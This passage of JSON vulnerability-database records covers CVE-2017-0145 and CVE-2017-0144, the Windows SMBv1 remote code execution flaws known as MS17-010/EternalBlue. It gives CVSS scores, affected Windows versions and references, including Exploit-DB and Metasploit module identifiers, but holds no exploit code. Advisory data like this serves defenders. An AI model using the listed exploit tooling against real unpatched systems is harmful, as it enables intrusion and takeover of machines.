"hash": "2de16ce8c1076d817b34239dfd00a586df5971e4a0c0094cb10df6ee7db3bd6a", "hashmap": [{"hash": "fa45dfd2d3ab3df8318df841cddd6b0c", "key": "title"}, {"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e0539df20e5be3ef177a101df2352a5e", "key": "href"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": 
"d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "cf496359fbe86c47c00b29590cbc0738", "key": "references"}, {"hash": "01656a0a375c60b2d690e64e9b9d5852", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0145", "id": "CVE-2017-0145", "lastseen": "2020-10-03T13:07:29", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96705", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0145", "type": "cve", "viewCount": 71}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-10-03T13:07:29"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "dd4a1fba31e29c6988f563bdeb65c80c"}, {"key": "affectedSoftware", "hash": "e758f8fa39ce9e8de2ffe527ec8b6423"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a173072793578541ea04b7baa0323592"}, {"key": "cpe23", "hash": "0751f4e56f29adf827144e01a128331d"}, {"key": "cpeConfiguration", "hash": "6ac681e59932d7c840205e984b11bad5"}, {"key": 
"cvelist", "hash": "6e85843f0a1ea97153b93d90b1fbe01c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "cwe", "hash": "226da5129ffaaee3d5b48e506b957d58"}, {"key": "description", "hash": "01656a0a375c60b2d690e64e9b9d5852"}, {"key": "extraReferences", "hash": "2c23b77afb0f021934f5effbf46ef757"}, {"key": "href", "hash": "e0539df20e5be3ef177a101df2352a5e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d68798550042e5272198c20ea65d8f01"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "cf496359fbe86c47c00b29590cbc0738"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "fa45dfd2d3ab3df8318df841cddd6b0c"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "b515c940a420da2f6cc1297c746f108fddabf71fe57fefcd441c37455e5cc7e7", "viewCount": 140, "enchantments": {"dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", 
"THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-04-23T00:07:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}], "modified": 
"2021-04-23T00:07:42"}, "score": {"value": 9.1, "vector": "NONE", "modified": "2021-04-23T00:07:42", "rev": 2}, "twitter": {"counter": 88, "tweets": [{"link": "https://twitter.com/RonnyArias/status/1422356892483981314", "text": "Blue - I have just completed this room! Check it out: https://t.co/TJq1bBTWoK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/QuentinCasares/status/1422521751523762177", "text": "Blue - I have just completed this room! Check it out: https://t.co/0l0HtT6bML?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/shadow44406573/status/1423260611429998593", "text": "Blue - I have just completed this room! Check it out: https://t.co/sijYaXhkoQ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/top_wizard/status/1423289010630270995", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/1ICOkz0X0h?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/InfoSec_MBE/status/1425558031790657546", "text": "Blue - I have just completed this room! Check it out: https://t.co/Tms9b4JF84?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/uk_NJx/status/1426573521308762112", "text": "Blue - I have just completed this room! Check it out: https://t.co/B1WGZBexHA?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/carlos_o_m/status/1426612611009892352", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/6jaCHwnUja?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click a trav\u00e9s de /RealTryHackMe"}, {"link": "https://twitter.com/AynRandSucks/status/1429439489068306434", "text": "Blue - I have just completed this room! Check it out: https://t.co/Ypt3f3Ra8A?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/cts_technology/status/1429414666082607108", "text": "Finally!\nBlue - I have just completed this room! Check it out: https://t.co/hJYxVXD4we?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0x6d61/status/1430147082573074436", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/08xRz1yFx7?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}], "modified": "2021-04-23T00:07:42"}}, "objectVersion": "1.5", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, 
{"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", 
"cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "refsource": "CONFIRM", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", 
"tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "96705", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96705"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "immutableFields": []}, {"id": "CVE-2017-0144", "bulletinFamily": "NVD", "title": "CVE-2017-0144", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "published": "2017-03-17T00:59:00", "modified": "2018-06-21T01:29:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0144", "reporter": "secure@microsoft.com", "references": ["https://www.exploit-db.com/exploits/42031/", "https://www.exploit-db.com/exploits/42030/", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", 
"https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0144"], "type": "cve", "lastseen": "2021-04-23T00:07:42", "history": [{"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:16:45", "references": [{"idList": ["KLA10977", 
"KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"], "type": "threatpost"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": 
["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-05-29T18:16:45", "value": 8.4, "vector": "NONE"}}, "hash": "160d463cdf6108e0c3b4f4b3e0cb3bdb62baa98398b542253a8147bd30bc4d34", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "3d33672b05b572e15dc2cac26ad54d7c", "key": "title"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "515eb09d946f69b39e3e0878e761b6fb", "key": "references"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6fd95f86c673c4a8b4f1fd51b22d928f", "key": "href"}, {"hash": "e9f80c9b0a5d969452d09ddbf4c74a71", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": 
